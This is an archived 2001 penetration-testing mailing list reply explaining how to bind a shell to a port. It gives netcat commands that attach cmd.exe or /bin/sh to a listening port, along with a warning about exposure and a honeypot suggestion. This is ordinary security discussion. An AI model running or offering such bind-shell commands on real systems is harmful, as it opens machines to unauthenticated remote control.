Penetration Testing mailing list archives

Re: [PEN-TEST]


From: bs <bsshuhart () ONEMAIN COM>
Date: Wed, 14 Feb 2001 08:16:10 -0500

use netcat  ( Thanks again Hobbit !  )

windblows
nc -l -n -v -p port_num -e cmd.exe

unix
nc -l -n -v -p port_num -e /bin/sh

Caution:  This setup will open your system up to connection from anyone that
can see the selected "port_num".  If you add an IP to the end of the line,
netcat will only accept connections from the specified IP.

This is also a great way to set up a Honeypot on your network.  Simply bind
netcat to various ports, only accept connections from its own IP, and
execute a small script that writes to your audit logs.  Using a "-L" instead
of the lower case "l" will respawn netcat after a connection is dropped.

bs


----- Original Message -----
From: "heh" <atody () NS ARENA ASSIST RO>
To: <PEN-TEST () SECURITYFOCUS COM>
Sent: Tuesday, February 13, 2001 7:23 PM
Subject: [PEN-TEST]


hi
 i have one question: how can you bind a shell to a specified port using
/etc/inetd.conf ?
 i tried many ways to do it but i couldn't find out how...



Current thread: